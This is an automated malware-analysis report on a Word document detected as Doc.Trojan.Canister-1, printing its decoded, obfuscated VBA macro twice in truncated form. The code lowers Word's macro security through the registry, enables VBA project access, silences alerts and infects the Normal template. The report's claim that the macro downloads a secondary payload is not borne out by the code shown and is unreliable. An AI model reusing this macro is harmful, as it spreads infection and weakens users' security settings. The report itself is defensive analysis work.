Office (OLE) malware analysis — malicious · 6ba02f6b18dec955

MALICIOUS

Office (OLE)

31.5 KB Created: 2003-08-16 15:46:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: 6a6f30f8532bc94f9ce24709c26dac80 SHA-1: 949fb37b65be8ec5b01db3cdd30ecb75ae6123fd SHA-256: 6ba02f6b18dec955e25e6831d9a939403a3bb42b2c59bcd50a23faf025d14d01

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros, indicated by the OLE_VBA_MACROS heuristic. The script uses `CallByName` extensively and attempts to manipulate registry keys, specifically writing to `HKCU\Software\Microsoft\Office\10.0\Word\Security\Current_user\File`. This suggests the macro is designed to download and execute a secondary payload, aligning with the ClamAV detection of 'Doc.Trojan.Canister-1'.

Heuristics 3

ClamAV: Doc.Trojan.Canister-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Canister-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4533 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4533 bytes
SHA-256: `8950fd0308382aa3fe1d11df3e161ac4196dfb82d57480f707fa00e210e0091c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Private Sub Document_Close() 'WMXP.CaniSter by Kernel32 FQPOTCYBCLM01: Randomize Timer: Dim KBPOIAJSIJCW(20) As String: Dim MLGBQPWVWVX(10) As String: GoSub FQPOTCYBCLM25: GoTo FQPOTCYBCLM20 FQPOTCYBCLM06: VBA.CallByName Options.Application, MLGBQPWVWVX(3), VbLet, XJKMRRVTYRGUW: VBA.CallByName Options, MLGBQPWVWVX(6), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM07: FQPOTCYBCLM09: VBA.CallByName CLAUYYGHVGDU, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM10 FQPOTCYBCLM13: KBPOIAJSIJCW(LDYPAMMQBIQB) = "VQWNCIKMOVNKI": KBPOIAJSIJCW(2) = "XJKMRRVTYRGUW": KBPOIAJSIJCW(3) = "LDYPAMMQBIQB": KBPOIAJSIJCW(13) = "MLGBQPWVWVX": GoTo FQPOTCYBCLM14 FQPOTCYBCLM21: MLGBQPWVWVX(3) = StrReverse("gnitadpUneercS"): MLGBQPWVWVX(4) = StrReverse("senileteleD"): GoTo FQPOTCYBCLM22 FQPOTCYBCLM20: MLGBQPWVWVX(1) = StrReverse("senilfotnuoC"): MLGBQPWVWVX(2) = StrReverse("seniL"): GoTo FQPOTCYBCLM21 FQPOTCYBCLM22: MLGBQPWVWVX(5) = StrReverse("gnirtsmorfddA"): MLGBQPWVWVX(6) = StrReverse("tpmorPlamroNevaS"): GoTo FQPOTCYBCLM23 FQPOTCYBCLM10: Set BUPFMXCXSNUGW = ActiveDocument.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM11 FQPOTCYBCLM07: Set CLAUYYGHVGDU = NormalTemplate.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM08 FQPOTCYBCLM25: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), "Level", 1&: GoTo FQPOTCYBCLM26 FQPOTCYBCLM16: KBPOIAJSIJCW(10) = "HGSEMIQXFLIQDY": KBPOIAJSIJCW(11) = "UIVFVFDGUKHE": KBPOIAJSIJCW(12) = "AIWAMVYCGFN": GoTo FQPOTCYBCLM17 FQPOTCYBCLM24: MLGBQPWVWVX(9) = StrReverse("strelAyalpsiD"): MLGBQPWVWVX(10) = StrReverse("enilecalpeR"): GoTo FQPOTCYBCLM02 FQPOTCYBCLM04: VBA.CallByName Application, MLGBQPWVWVX(7), VbLet, XJKMRRVTYRGUW: VBA.CallByName Application, MLGBQPWVWVX(9), VbLet, wdAlertsNone: GoTo FQPOTCYBCLM05 FQPOTCYBCLM11: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(4), VbMethod, LDYPAMMQBIQB, VBA.CallByName(BUPFMXCXSNUGW, MLGBQPWVWVX(1), VbGet): GoTo FQPOTCYBCLM12 FQPOTCYBCLM19: For HGSEMIQXFLIQDY = 2 To 25 Step VBA.Int(Rnd * 3) + LDYPAMMQBIQB: UIVFVFDGUKHE = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB + HGSEMIQXFLIQDY, LDYPAMMQBIQB): AIWAMVYCGFN = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, 2 + HGSEMIQXFLIQDY, LDYPAMMQBIQB): VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + LDYPAMMQBIQB, AIWAMVYCGFN: VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + 2, UIVFVFDGUKHE: Next: End FQPOTCYBCLM15: KBPOIAJSIJCW(7) = "KBPOIAJSIJCW": KBPOIAJSIJCW(8) = "FQPOTCYBCLM": KBPOIAJSIJCW(9) = "BRYTJTKYYSHVMU": GoTo FQPOTCYBCLM16 FQPOTCYBCLM12: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM19 FQPOTCYBCLM26: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), StrReverse("MOBVsseccA"), 1&: Return FQPOTCYBCLM05: VBA.CallByName Application.Options, MLGBQPWVWVX(8), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM06 FQPOTCYBCLM02: XJKMRRVTYRGUW = (False * False): LDYPAMMQBIQB = (True / True): Set VQWNCIKMOVNKI = VBE.ActiveVBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM03 FQPOTCYBCLM18: QCAJUDMVDGGJEV = Replace(QCAJUDMVDGGJEV, KBPOIAJSIJCW(Int(Rnd * 13) + LDYPAMMQBIQB), BRYTJTKYYSHVMU): Return FQPOTCYBCLM23: MLGBQPWVWVX(7) = StrReverse("raBsutatsyalpsiD"): MLGBQPWVWVX(8) = StrReverse("snoisrevnoCmrifnoC"): GoTo FQPOTCYBCLM24 FQPOTCYBCLM03: QCAJUDMVDGGJEV = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB, VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(1), VbGet)): GoSub FQPOTCYBCLM13: GoTo FQPOTCYBCLM04 FQPOTCYBCLM14: KBPOIAJSIJCW(4) = "QCAJUDMVD ... (truncated)

SHA-256: 8950fd0308382aa3fe1d11df3e161ac4196dfb82d57480f707fa00e210e0091c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub Document_Close() 'WMXP.CaniSter by Kernel32
FQPOTCYBCLM01: Randomize Timer: Dim KBPOIAJSIJCW(20) As String: Dim MLGBQPWVWVX(10) As String: GoSub FQPOTCYBCLM25: GoTo FQPOTCYBCLM20
FQPOTCYBCLM06: VBA.CallByName Options.Application, MLGBQPWVWVX(3), VbLet, XJKMRRVTYRGUW: VBA.CallByName Options, MLGBQPWVWVX(6), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM07:
FQPOTCYBCLM09: VBA.CallByName CLAUYYGHVGDU, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM10
FQPOTCYBCLM13: KBPOIAJSIJCW(LDYPAMMQBIQB) = "VQWNCIKMOVNKI": KBPOIAJSIJCW(2) = "XJKMRRVTYRGUW": KBPOIAJSIJCW(3) = "LDYPAMMQBIQB": KBPOIAJSIJCW(13) = "MLGBQPWVWVX": GoTo FQPOTCYBCLM14
FQPOTCYBCLM21: MLGBQPWVWVX(3) = StrReverse("gnitadpUneercS"): MLGBQPWVWVX(4) = StrReverse("senileteleD"): GoTo FQPOTCYBCLM22
FQPOTCYBCLM20: MLGBQPWVWVX(1) = StrReverse("senilfotnuoC"): MLGBQPWVWVX(2) = StrReverse("seniL"): GoTo FQPOTCYBCLM21
FQPOTCYBCLM22: MLGBQPWVWVX(5) = StrReverse("gnirtsmorfddA"): MLGBQPWVWVX(6) = StrReverse("tpmorPlamroNevaS"): GoTo FQPOTCYBCLM23
FQPOTCYBCLM10: Set BUPFMXCXSNUGW = ActiveDocument.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM11
FQPOTCYBCLM07: Set CLAUYYGHVGDU = NormalTemplate.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM08
FQPOTCYBCLM25: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), "Level", 1&: GoTo FQPOTCYBCLM26
FQPOTCYBCLM16: KBPOIAJSIJCW(10) = "HGSEMIQXFLIQDY": KBPOIAJSIJCW(11) = "UIVFVFDGUKHE": KBPOIAJSIJCW(12) = "AIWAMVYCGFN": GoTo FQPOTCYBCLM17
FQPOTCYBCLM24: MLGBQPWVWVX(9) = StrReverse("strelAyalpsiD"): MLGBQPWVWVX(10) = StrReverse("enilecalpeR"): GoTo FQPOTCYBCLM02
FQPOTCYBCLM04: VBA.CallByName Application, MLGBQPWVWVX(7), VbLet, XJKMRRVTYRGUW: VBA.CallByName Application, MLGBQPWVWVX(9), VbLet, wdAlertsNone: GoTo FQPOTCYBCLM05
FQPOTCYBCLM11: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(4), VbMethod, LDYPAMMQBIQB, VBA.CallByName(BUPFMXCXSNUGW, MLGBQPWVWVX(1), VbGet): GoTo FQPOTCYBCLM12
FQPOTCYBCLM19: For HGSEMIQXFLIQDY = 2 To 25 Step VBA.Int(Rnd * 3) + LDYPAMMQBIQB: UIVFVFDGUKHE = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB + HGSEMIQXFLIQDY, LDYPAMMQBIQB): AIWAMVYCGFN = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, 2 + HGSEMIQXFLIQDY, LDYPAMMQBIQB): VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + LDYPAMMQBIQB, AIWAMVYCGFN: VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + 2, UIVFVFDGUKHE: Next: End
FQPOTCYBCLM15: KBPOIAJSIJCW(7) = "KBPOIAJSIJCW": KBPOIAJSIJCW(8) = "FQPOTCYBCLM": KBPOIAJSIJCW(9) = "BRYTJTKYYSHVMU": GoTo FQPOTCYBCLM16
FQPOTCYBCLM12: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM19
FQPOTCYBCLM26: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), StrReverse("MOBVsseccA"), 1&: Return
FQPOTCYBCLM05: VBA.CallByName Application.Options, MLGBQPWVWVX(8), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM06
FQPOTCYBCLM02: XJKMRRVTYRGUW = (False * False): LDYPAMMQBIQB = (True / True): Set VQWNCIKMOVNKI = VBE.ActiveVBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM03
FQPOTCYBCLM18: QCAJUDMVDGGJEV = Replace(QCAJUDMVDGGJEV, KBPOIAJSIJCW(Int(Rnd * 13) + LDYPAMMQBIQB), BRYTJTKYYSHVMU): Return
FQPOTCYBCLM23: MLGBQPWVWVX(7) = StrReverse("raBsutatsyalpsiD"): MLGBQPWVWVX(8) = StrReverse("snoisrevnoCmrifnoC"): GoTo FQPOTCYBCLM24
FQPOTCYBCLM03: QCAJUDMVDGGJEV = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB, VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(1), VbGet)): GoSub FQPOTCYBCLM13: GoTo FQPOTCYBCLM04
FQPOTCYBCLM14: KBPOIAJSIJCW(4) = "QCAJUDMVD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.